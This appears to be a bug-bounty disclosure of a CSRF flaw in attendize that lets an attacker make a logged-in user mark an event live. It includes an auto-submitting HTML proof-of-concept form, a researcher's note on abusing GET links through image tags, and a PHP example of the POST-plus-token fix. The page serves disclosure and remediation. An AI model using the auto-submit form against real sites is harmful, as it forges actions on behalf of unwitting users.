Cross-Site Request Forgery (CSRF) in attendize/attendize

Valid

Reported on

Sep 25th 2021


Description

An attacker can cause a logged-in user's browser to mark an event live.

Proof of Concept

While logged in, open this POC.html in a browser.

<html>
<body>
<!-- Replace the PoC page's own URL in the address bar -->
<script>history.pushState('', '', '/')</script>
<!-- No method attribute, so the form submits as a GET; "Demo URL" stands for the make-live endpoint -->
<form action="Demo URL">
    <input type="submit" value="Submit request" />
</form>
<!-- Submit automatically as soon as the page loads -->
<script>
  document.forms[0].submit();
</script>
</body>
</html>

Impact

This vulnerability lets an attacker forge a request that makes a user unintentionally mark an event live.

Test

Tested on Safari.

Fix

You should require a CSRF token on such GET requests, or change them to POST: because the session cookie's SameSite attribute is Lax, a cross-origin POST could then not carry the cookie.
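As an added example (not attendize's own code), a Laravel route in the weak GET form beside the hardened POST form the fix above describes; the route path, name and controller body are hypothetical placeholders.

```php
<?php
// routes/web.php style example; Laravel loads this file inside the 'web'
// middleware group, which includes VerifyCsrfToken. Names are hypothetical.

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;

// BEFORE: a state-changing action reachable by GET. An auto-submitted
// cross-site GET form (the PoC above) reaches it with the victim's session
// cookie, because SameSite=Lax still attaches cookies to top-level GET
// navigations, and VerifyCsrfToken does not check GET requests at all.
Route::get('/event/{event_id}/make-live', function (Request $request, $event_id) {
    // ... mark event live ...
    return redirect()->back();
});

// AFTER: POST only. VerifyCsrfToken now rejects the request with HTTP 419
// unless _token matches the session token, and a SameSite=Lax session cookie
// is not sent on cross-site POSTs in the first place.
Route::post('/event/{event_id}/make-live', function (Request $request, $event_id) {
    // What the middleware does, made explicit as a defence in depth:
    // compare the submitted token with the session token in constant time.
    $sessionToken = $request->session()->token();
    $sentToken    = $request->input('_token') ?? $request->header('X-CSRF-TOKEN');
    if (!is_string($sentToken) || !hash_equals($sessionToken, $sentToken)) {
        abort(419, 'CSRF token mismatch');
    }
    // ... mark event live ...
    return redirect()->back();
})->name('event.make_live');

// The Blade form that replaces the old GET link renders the token:
//   <form method="POST" action="{{ route('event.make_live', $event->id) }}">
//       @csrf   {{-- expands to <input type="hidden" name="_token" value="..."> --}}
//       <button type="submit">Make live</button>
//   </form>
//
// config/session.php should keep 'same_site' => 'lax' (Laravel's default)
// so the cookie is withheld from cross-site POSTs.
```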

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the attendize team and are waiting to hear back 2 months ago
We have sent a third and final follow up to the attendize team. This report is stale. a month ago
HDVinnie
a month ago

Researcher


To expand:

One way GET could be abused here is that a person (competitor perhaps:) places an image tag with src="<your logout link>" ANYWHERE on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out.

This is why it should be a POST with a @csrf token.

Johanna Cherry validated this vulnerability a month ago
HDVinnie has been awarded the disclosure bounty
The fix bounty is now up for grabs
Johanna Cherry confirmed that a fix has been merged on a2aadf a month ago
Johanna Cherry has been awarded the fix bounty
TopNav.blade.php#L10 has been validated
web.php#L326-L328 has been validated